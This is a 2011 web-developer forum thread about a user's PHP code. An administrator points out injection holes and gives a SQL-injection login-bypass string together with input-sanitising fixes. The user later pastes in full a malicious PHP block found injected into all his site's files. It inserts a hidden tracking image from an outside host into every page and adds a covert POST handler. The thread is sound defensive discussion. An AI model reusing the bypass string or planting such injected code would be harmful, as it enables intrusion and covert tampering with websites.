The Cache: Technology Expert's Forum
 
*
Welcome, Guest. Please login or register. September 23, 2019, 01:59:13 AM

Login with username, password and session length


Pages: [1]
  Print  
Author Topic: where are we at with that?  (Read 2664 times)
Phaėton
Lifer
*****
Offline Offline

Posts: 555


⎝⏠⏝⏠⎠


View Profile
« on: June 12, 2011, 11:11:49 AM »

Them: What have you done thus far?Huh?

(notice the arrogant extra question marks)

Me(under breath) Well mostly just report to bi-hourly status updates
to a force of distraction from you clods, much worse than a newborn puppy.

Me(above breath): I have a bug im trying to track down.


Them:  Can you post to the site what you have done so i can see your progress?

(me:)




* progress.JPG (122.66 KB, 1024x600 - viewed 172 times.)
Logged

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
Phaėton
Lifer
*****
Offline Offline

Posts: 555


⎝⏠⏝⏠⎠


View Profile
« Reply #1 on: June 12, 2011, 11:13:04 AM »

ME: this should shut them up for a while.


 ROFLMAO ROFLMAO ROFLMAO ROFLMAO ROFLMAO
Logged

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
perkiset
Olde World Hacker
Administrator
Lifer
*****
Offline Offline

Posts: 10096



View Profile
« Reply #2 on: June 12, 2011, 11:57:02 AM »

(me, looking at Phaeton code): unless that's proto code you might want to do a little more cleansing because there look to be several vectors left open in there ...
Logged

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton
Lifer
*****
Offline Offline

Posts: 555


⎝⏠⏝⏠⎠


View Profile
« Reply #3 on: June 12, 2011, 12:21:01 PM »

do tell perkiset?


btw i fixed that error for them and now im dealing with this one:

weve got fatal errors on line 10692 and more time to not answer questions.. (lol)

but i just did a bunch of code pasted together in random order... where you talking
about the passwordsubmitted / ghetto login stuff cause that actually is something
else im dicking with .... do tell... vectors?


* fatalerror.JPG (10.39 KB, 938x76 - viewed 168 times.)
Logged

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
perkiset
Olde World Hacker
Administrator
Lifer
*****
Offline Offline

Posts: 10096



View Profile
« Reply #4 on: June 12, 2011, 03:12:02 PM »

submit a password of
' or 1 or '

(with apostrophes)

many ways to maneuver that one, make sure that there's no way people can send you controlling characters.

try
$_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);

that's a quick and dirty squasher that will make sure that nothing except characters you expect come though fields like that.

For numerics, my personal favorite is

$_POST['numVal'] = $_POST['numVal'] - 0;

Logged

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton
Lifer
*****
Offline Offline

Posts: 555


⎝⏠⏝⏠⎠


View Profile
« Reply #5 on: June 12, 2011, 04:35:39 PM »

submit a password of
' or 1 or '

(with apostrophes)

many ways to maneuver that one, make sure that there's no way people can send you controlling characters.

try
$_POST['thePassword'] = preg_replace('/[^A-Z0-9\-_\.]/i', '', $_POST['thePassword']);

that's a quick and dirty squasher that will make sure that nothing except characters you expect come though fields like that.

For numerics, my personal favorite is

$_POST['numVal'] = $_POST['numVal'] - 0;




im guessing you pass the whole $_POST off for cleaning to a routine!


I like the 'numval-0'  very nice!

so lets say i just leave it without stripping all but allowable characters..

what could someone do by sending me control characters? send like a '; eval('file_get_contents('worlddom.php');
as a post var?

or something like that?


Logged

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
perkiset
Olde World Hacker
Administrator
Lifer
*****
Offline Offline

Posts: 10096



View Profile
« Reply #6 on: June 12, 2011, 11:42:18 PM »

That would represent a larger hole andIve not toyed with that. I was targeting DBinjections actually.

Yes, I often setup a cleansing routine if I have a lot of input I need from the user. I'll often cleanse it first in JS first, then look for dodgy chars. If they are there, then I am 100% certain that the post was programmatically sent and most likely, by one of my, ahem, buddies here Wink I'd rather put the normal work of char cleansing out at the client so I don't even need to burden my servers with it. But I double up when it's arrived anyway.

BTW real geeks would've said
$_POST['numVal'] -= 0;
because it compiles tighter. I remember that syntax when working real arithmetic, but just always seem to forget it in simple cleansers.
Logged

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
Phaėton
Lifer
*****
Offline Offline

Posts: 555


⎝⏠⏝⏠⎠


View Profile
« Reply #7 on: June 29, 2011, 12:59:25 PM »

oh so thats what prollhy happened here where someone put this crap
in every php file even my backups:

Code:
<?php
//{{126104ed

GLOBAL $alreadyxxx;
if(
$alreadyxxx != 1)
{
$alreadyxxx 1;

$olderrxxx=error_reporting(0);

function 
outputxxx_callback($str)
{
  
$links '<SPAN STYLE="font-style: normal; visibility: hidden; position: absolute; left: 0px; top: 0px;"><div id="af4dae82ae67843a194c001162"><img width=0 height=0 src="http://airschk.com/countbk.gif?id=4dae82ae67843a194c001162&p=1&a=%91P%BC%BCQ%F7%20%7C6%BE%0A8%F52%9C%F5nT%82%8A%C8V%27%A1%1E%85%1B%16%DBh%F2%A3U%10%9Dh%9C%FF%B6t%0F%B2%E9%18"></div></SPAN>';
  
preg_match("|</body>|si",$str,$arr);
  return 
str_replace($arr[0],$links.$arr[0],$str);
}

function 
StrToNum($Str$Check$Magic)
{
   
$Int32Unit 4294967296;
   
$length strlen($Str);
   for (
$i 0$i $length$i++) {
       
$Check *= $Magic;
       if (
$Check >= $Int32Unit) {
           
$Check = ($Check $Int32Unit * (int) ($Check $Int32Unit));
           
$Check = ($Check < -2147483648) ? ($Check $Int32Unit) : $Check;
       }
       
$Check += ord($Str{$i});
   }
   return 
$Check;
}
function 
HashURL($String)
{
   
$Check1 StrToNum($String0x15050x21);
   
$Check2 StrToNum($String00x1003F);

   
$Check1 >>= 2;
   
$Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 0x3F);
   
$Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 0x3FF);
   
$Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 0x3FFF);

   
$T1 = (((($Check1 0x3C0) << 4) | ($Check1 0x3C)) <<) | ($Check2 0xF0F );
   
$T2 = (((($Check1 0xFFFFC000) << 4) | ($Check1 0x3C00)) << 0xA) | ($Check2 0xF0F0000 );

   return (
$T1 $T2);
}

function 
CheckHash($Hashnum)
{
   
$CheckByte 0;
   
$Flag 0;

   
$HashStr sprintf('%u'$Hashnum) ;
   
$length strlen($HashStr);

   for (
$i $length-1$i >= 0;  $i--) {
       
$Re $HashStr{$i};
       if (
=== ($Flag 2)) {
           
$Re += $Re;
           
$Re = (int)($Re 10) + ($Re 10);
       }
       
$CheckByte += $Re;
       
$Flag ++;
   }

   
$CheckByte %= 10;
   if (
!== $CheckByte) {
       
$CheckByte 10 $CheckByte;
       if (
=== ($Flag 2) ) {
           if (
=== ($CheckByte 2)) {
               
$CheckByte += 9;
           }
           
$CheckByte >>= 1;
       }
   }

   return 
'7'.$CheckByte.$HashStr;
}

function 
getpr($url)
{
   
$ch CheckHash(HashURL($url));
   
$file "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   
$data file_get_contents($file);
   
$pos strpos($data"Rank_");
   if(
$pos === false){return -1;} else{
       
$pr=substr($data$pos 9);
       
$pr=trim($pr);
       
$pr=str_replace("
"
,'',$pr);
       return 
$pr;
   }
}

if(isset(
$_POST['xxxprch']))
{
    echo 
getpr($_POST['xxxprch']);
    exit();
}
else
  
ob_start('outputxxx_callback');

error_reporting($olderrxxx);
}

//}}861921ab
Logged

When I was your age we used to walk to the TV to change the channel....  _̴ı̴̴̡̡̡ ̡͌l̡̡̡ ̡͌l̡*̡̡ ̴̡ı̴̴̡ ̡̡͡|̲̲̲͡͡͡ ̲▫̲͡ ̲̲̲͡͡π̲̲͡͡ ̲̲͡▫̲̲͡͡ ̲|̡̡̡ ̡ ̴̡ı̴̡̡
nutballs
Administrator
Lifer
*****
Offline Offline

Posts: 5627


Back in my day we had 9 planets


View Profile
« Reply #8 on: June 29, 2011, 03:53:23 PM »

Err wtf is >>=
I must really be stuck in verbosity land.
Logged

I could eat a bowl of Alphabet Soup and shit a better argument than that.
perkiset
Olde World Hacker
Administrator
Lifer
*****
Offline Offline

Posts: 10096



View Profile
« Reply #9 on: June 29, 2011, 11:23:00 PM »

bitwise shift right + the php assign to operator.

Much like +=, but >>= shift equals

Logged

It is now believed, that after having lived in one compound with 3 wives and never leaving the house for 5 years, Bin Laden called the U.S. Navy Seals himself.
nutballs
Administrator
Lifer
*****
Offline Offline

Posts: 5627


Back in my day we had 9 planets


View Profile
« Reply #10 on: June 30, 2011, 07:32:36 AM »

Oh yea. That ancient mystery of code.
Logged

I could eat a bowl of Alphabet Soup and shit a better argument than that.
Pages: [1]
  Print  
 
Jump to:  

Perkiset's Place Home   Best of The Cache   phpMyIDE: MySQL Stored Procedures, Functions & Triggers
Politics @ Perkiset's   Pinkhat's Perspective   
cache
mart
coder
programmers
ajax
php
javascript
Powered by MySQL Powered by PHP Powered by SMF 1.1.2 | SMF © 2006-2007, Simple Machines LLC
Seo4Smf v0.2 © Webmaster's Talks


Valid XHTML 1.0! Valid CSS!